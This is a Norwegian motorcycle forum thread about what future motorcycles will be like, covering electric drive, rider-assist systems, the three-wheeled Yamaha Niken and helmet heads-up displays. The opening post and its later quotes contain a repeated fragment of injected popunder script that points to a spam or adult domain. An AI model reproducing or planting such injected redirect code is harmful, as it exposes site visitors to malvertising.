Framtidens motorsykler - tro og tanker om hvordan disse blir...
-
OnlineAJ
- Administrator
- Innlegg: 38012
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Framtidens motorsykler - tro og tanker om hvordan disse blir...
Utviklingen går kanskje kjappere enn vi tror - og liker
Motorsykkelfolk er tross alt ganske konservative har det vist seg opp gjennom årene.
Men det spørs om ikke utviklingen gjør at de fleste av oss bare er nødt til å bøye av. Eller hva tror folket her inne?
Vil motorsykler flest i ikke altfor fjern framtid være som denne Yamaha'en, tro?
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Masse elektronikk, avanserte assistentsystemer, elmotor og drift på begge hjulene osv. osv.
Motorsykkelfolk er tross alt ganske konservative har det vist seg opp gjennom årene.
Men det spørs om ikke utviklingen gjør at de fleste av oss bare er nødt til å bøye av. Eller hva tror folket her inne?
Vil motorsykler flest i ikke altfor fjern framtid være som denne Yamaha'en, tro?
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Masse elektronikk, avanserte assistentsystemer, elmotor og drift på begge hjulene osv. osv.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Ser fin ut den, bare rekkevidden er der så.
Men uansett så er ikke denne for meg siden jeg heter Roy
Men uansett så er ikke denne for meg siden jeg heter Roy
Nå har jeg surmult og vært sur som fa** i to år og plutselig ble jeg positiv.....
- gsx750_80
- Innlegg: 2212
- Registrert: 24 apr 2010, 19:34
- Motorsykkelen din: GSX 750 '80, Ninja 250R m.fl.
- Sted: Trøndelag
- Kontakt:
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Jeg antar denne fort kan ha framtida bak seg: https://www.cycleworld.com/2019-Yamaha- ... EICMA-2017
Skjønner ikke grunnen til å lage noe slikt. Er den ment for folk med dårlig balanse, eller som en slags gradvis avvenning fra mc, og som overgang til gåstol?
Skjønner ikke grunnen til å lage noe slikt. Er den ment for folk med dårlig balanse, eller som en slags gradvis avvenning fra mc, og som overgang til gåstol?
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Positivt sett blir det kanskje mindre vedlikeholdskostnader med el. Jeg har en ventilhustering som bør tas i vinter, og prisen for det tar jo knekken på hele julegleden i høytiden som kommer mot oss.
- gsx750_80
- Innlegg: 2212
- Registrert: 24 apr 2010, 19:34
- Motorsykkelen din: GSX 750 '80, Ninja 250R m.fl.
- Sted: Trøndelag
- Kontakt:
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Jeg kontaktet nylig to firma, i forbindelse med service inkl. ventiljustering. 8000-8500 skulle de ha, her til lands. Jeg fikk et tilbud hos NorthBike i Sundsvall ( https://www.northbike.se/ ). De beregnet 4316 kroner. Det er noenogførti mil til Sundsvall, men kan jo være noe å vurdere. Du kan kanskje finne vesentlig rimeligere verksteder på svensk side.
mvh
-gsx750_80
-gsx750_80
- AlfaGuzzi
- Innlegg: 65
- Registrert: 16 okt 2013, 13:34
- Motorsykkelen din: 2013 - MotoGuzzi 1200 Sport Corsa
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Nei takk. Dette er helt unødvendig og forstyrrende. Ren kjøreglede er en motor med mye karakter og lyd og 2 hjul. Det er det du trenger.AJ skrev: ↑29 nov 2017, 10:43 Utviklingen går kanskje kjappere enn vi tror - og liker
Motorsykkelfolk er tross alt ganske konservative har det vist seg opp gjennom årene.
Men det spørs om ikke utviklingen gjør at de fleste av oss bare er nødt til å bøye av. Eller hva tror folket her inne?
Vil motorsykler flest i ikke altfor fjern framtid være som denne Yamaha'en, tro?
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Masse elektronikk, avanserte assistentsystemer, elmotor og drift på begge hjulene osv. osv.
Men for de som nå er på barneskolen og ikke vet om annet enn el-biler og autonome kjøretøyer så er sikkert dette midt i blinken.
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Knalltips :) Har funnet et verksted i østersund, så jeg skal sjekke pris der. Ellers, uten å ha prøvd en el-mc, ser jeg for meg at en forbrenningsmotor-mc har ti ganger så mye sjel som sin elektriske konkurrent.gsx750_80 skrev: ↑29 nov 2017, 15:36Jeg kontaktet nylig to firma, i forbindelse med service inkl. ventiljustering. 8000-8500 skulle de ha, her til lands. Jeg fikk et tilbud hos NorthBike i Sundsvall ( https://www.northbike.se/ ). De beregnet 4316 kroner. Det er noenogførti mil til Sundsvall, men kan jo være noe å vurdere. Du kan kanskje finne vesentlig rimeligere verksteder på svensk side.
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Jeg syns motorsykkelfirmaene burde samarbeide med hjelmer og interfacen som kan samkjøre med sykkelen. Evt. kan man laste ned sykkelens interface til den nye hjelmen som blir vist på visiret. På den måten slipper fører å se ned på dashbordet og vekk fra veien, men heller ha alt der hvor fokuset bør være.
- Stian87
- Innlegg: 2038
- Registrert: 14 mai 2016, 23:18
- Motorsykkelen din: Ducati Diavel 2016
- Sted: Ski
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Det finnes allerede hjelmer med heads-up display liknende teknologi. Er ikke sikker på om de er på markedet enda, men produktet er ihvertfall laget. Det tipper jeg er en ikke veldig fjern fremtidJuicebox skrev: ↑29 nov 2017, 19:16 Jeg syns motorsykkelfirmaene burde samarbeide med hjelmer og interfacen som kan samkjøre med sykkelen. Evt. kan man laste ned sykkelens interface til den nye hjelmen som blir vist på visiret. På den måten slipper fører å se ned på dashbordet og vekk fra veien, men heller ha alt der hvor fokuset bør være.
LocaToWeb Profilside
https://locatoweb.com/user/ztian
Ducati Monster 821 2016 (2016 - 2017) --> BMW S1000R 2017 (2017 - 2019) --> Ducati Diavel 2016 (2019--->)
https://locatoweb.com/user/ztian
Ducati Monster 821 2016 (2016 - 2017) --> BMW S1000R 2017 (2017 - 2019) --> Ducati Diavel 2016 (2019--->)
- kjellv
- Moderator
- Innlegg: 6972
- Registrert: 14 aug 2012, 23:16
- Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
- Sted: Molde
- Kontakt:
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Jeg tror kanskje du skal lese litt mer om Niken, du har nok ikke satt deg inn i dennes egenskapergsx750_80 skrev: ↑29 nov 2017, 13:56 Jeg antar denne fort kan ha framtida bak seg: https://www.cycleworld.com/2019-Yamaha- ... EICMA-2017
Skjønner ikke grunnen til å lage noe slikt. Er den ment for folk med dårlig balanse, eller som en slags gradvis avvenning fra mc, og som overgang til gåstol?
Niken gir absolutt ingen som helst assistanse for å holde den oppreist, hverken når den kjører eller når den stopper. Den velter akkurat som motorsykler på to hjul kan gjøre! Folk med balanseproblemer eller andre handicap vil ikke ha noen glede av denne dersom de ikke kan håndtere tohjuls motorsykler.
De som har kjørt den sier at du ikke kjører veldig mange meter før du glemmer at det er to forhjul. Du ser ikke forhjulene, og merker dem heller ikke mens du kjører. Fordelene er et mye bedre veigrep både i sving og ved bremsing.
- Bjerknez
- Innlegg: 23099
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Så da lurer jeg på en ting...kjellv skrev: ↑29 nov 2017, 21:29Jeg tror kanskje du skal lese litt mer om Niken, du har nok ikke satt deg inn i dennes egenskapergsx750_80 skrev: ↑29 nov 2017, 13:56 Jeg antar denne fort kan ha framtida bak seg: https://www.cycleworld.com/2019-Yamaha- ... EICMA-2017
Skjønner ikke grunnen til å lage noe slikt. Er den ment for folk med dårlig balanse, eller som en slags gradvis avvenning fra mc, og som overgang til gåstol?
Niken gir absolutt ingen som helst assistanse for å holde den oppreist, hverken når den kjører eller når den stopper. Den velter akkurat som motorsykler på to hjul kan gjøre! Folk med balanseproblemer eller andre handicap vil ikke ha noen glede av denne dersom de ikke kan håndtere tohjuls motorsykler.
De som har kjørt den sier at du ikke kjører veldig mange meter før du glemmer at det er to forhjul. Du ser ikke forhjulene, og merker dem heller ikke mens du kjører. Fordelene er et mye bedre veigrep både i sving og ved bremsing.
Hvis eneste fordelen med det ekstra fremhjulet er bedre veigrep ved brems og sving:
Veigrepet på min sykkel overgår vertfall mine kunnskaper og derfor så forstår jeg ikke at veigrepet er noe stort argument for å velge en slik. At den har kortere bremsestrekning tillater jeg meg litt og tvile på. Den veier jo sikkert vesentlig mer enn en vanlig sykkel. Eller?
Hadde den kunnet låst akslene slik at man kunne slippe og holde balansen i feks. kø så hadde dette faktisk vært et argument for kjøp mener jeg. Når den ikke kan dette heller så føler jeg de ytterst få antatte veiegenskapene blir spist opp av argumenter som at den er tyngre, bredere, kan ikke kjøres i 2+ felt og blir vanskeligere å lanesplitte med etc. Prisen er nok også vesentlig høyere enn en tilsvarende sykkel med to hjul. Eller...?
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Det med veigrep må du forklare.kjellv skrev: ↑29 nov 2017, 21:29Jeg tror kanskje du skal lese litt mer om Niken, du har nok ikke satt deg inn i dennes egenskapergsx750_80 skrev: ↑29 nov 2017, 13:56 Jeg antar denne fort kan ha framtida bak seg: https://www.cycleworld.com/2019-Yamaha- ... EICMA-2017
Skjønner ikke grunnen til å lage noe slikt. Er den ment for folk med dårlig balanse, eller som en slags gradvis avvenning fra mc, og som overgang til gåstol?
Niken gir absolutt ingen som helst assistanse for å holde den oppreist, hverken når den kjører eller når den stopper. Den velter akkurat som motorsykler på to hjul kan gjøre! Folk med balanseproblemer eller andre handicap vil ikke ha noen glede av denne dersom de ikke kan håndtere tohjuls motorsykler.
De som har kjørt den sier at du ikke kjører veldig mange meter før du glemmer at det er to forhjul. Du ser ikke forhjulene, og merker dem heller ikke mens du kjører. Fordelene er et mye bedre veigrep både i sving og ved bremsing.
Hvis denne har mye bedre veigrep enn vanlige sykler, betyr det at den kan ha mye høyere kurvehastighet.
Noe jeg tviler sterkt at den har. Den har bare ett bakhjul som vanlige sykler, så grepet bak er neppe bedre og derfor begrenser kurvehastigheten seg og "fordelen" er bare salgsargument.
En annen ting søm taler mot denne påstanden er vekten av sykkelen.
Sist redigert av simpson den 01 des 2017, 06:22, redigert 1 gang totalt.
-
- Innlegg: 2264
- Registrert: 13 feb 2011, 15:43
- Motorsykkelen din: Honda cbr929rr 2000, Yamaha YZF R1 2006
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Sykler med avvikende hjuldiameter har vært laget før. 15 tommers dekk er ukurant og trolig dyrt ift standard 17 tommer.
Er fronten på denne egentlig bredere enn en vanlig front? Det er jo stye og speil som stikker mest ut på vanlige sykler. Kanskje den er like bra på lanesplitting?
Er fronten på denne egentlig bredere enn en vanlig front? Det er jo stye og speil som stikker mest ut på vanlige sykler. Kanskje den er like bra på lanesplitting?
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Skremmende.
For min del kjører jeg MC fordi jeg liker å kjøre, lyden lukten og vibrasjonene er viktige deler av opplevelsen!
En EL-sykkel vil aldri bli rett for meg, og ikke minst jeg vil kjøre selv!
Passive sikkerhetsmekanismer (abs, antispinn osv) er ok for meg, men når driten begynner å besteme hvordan det skal kjøres, da sier jeg takk for meg!!
Er jo nettopp derfor jeg ikke rir på hest! Kjøretøy med egen fri vilje er hel jævlige å kjøre!!
Enig, det er nok en gammel markedsføringsgimmic som henger igjen!
Firehjulstrekkere/AWD har "alltid" vært markedsført som om de har bedre veigrep enn sine for eller bakhjulsdrevne motsatser.
Sannheten er vel att en firehjulstrekker kan utnytte veigrepet bedre enn en tohjulsdrevet, ikke at den har mer/bedre veigrep.
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
I never apologize.
I'm sorry, but that's just the way I am.
I'm sorry, but that's just the way I am.
Re: Framtidens motorsykler - tro og tanker om hvordan disse blir...
Ja dette vet jeg, men ingen motorsykkelfabrikanter har gjort dette(?)- ergo - interfacen er helt ulike og de funker "dårlig". Det jeg prøver å si er at de burde samarbeides, eller at motorsykkelfabrikantene burde heller ta seg rollen som utvikler og produsent.Stian87 skrev: ↑29 nov 2017, 20:50Det finnes allerede hjelmer med heads-up display liknende teknologi. Er ikke sikker på om de er på markedet enda, men produktet er ihvertfall laget. Det tipper jeg er en ikke veldig fjern fremtidJuicebox skrev: ↑29 nov 2017, 19:16 Jeg syns motorsykkelfirmaene burde samarbeide med hjelmer og interfacen som kan samkjøre med sykkelen. Evt. kan man laste ned sykkelens interface til den nye hjelmen som blir vist på visiret. På den måten slipper fører å se ned på dashbordet og vekk fra veien, men heller ha alt der hvor fokuset bør være.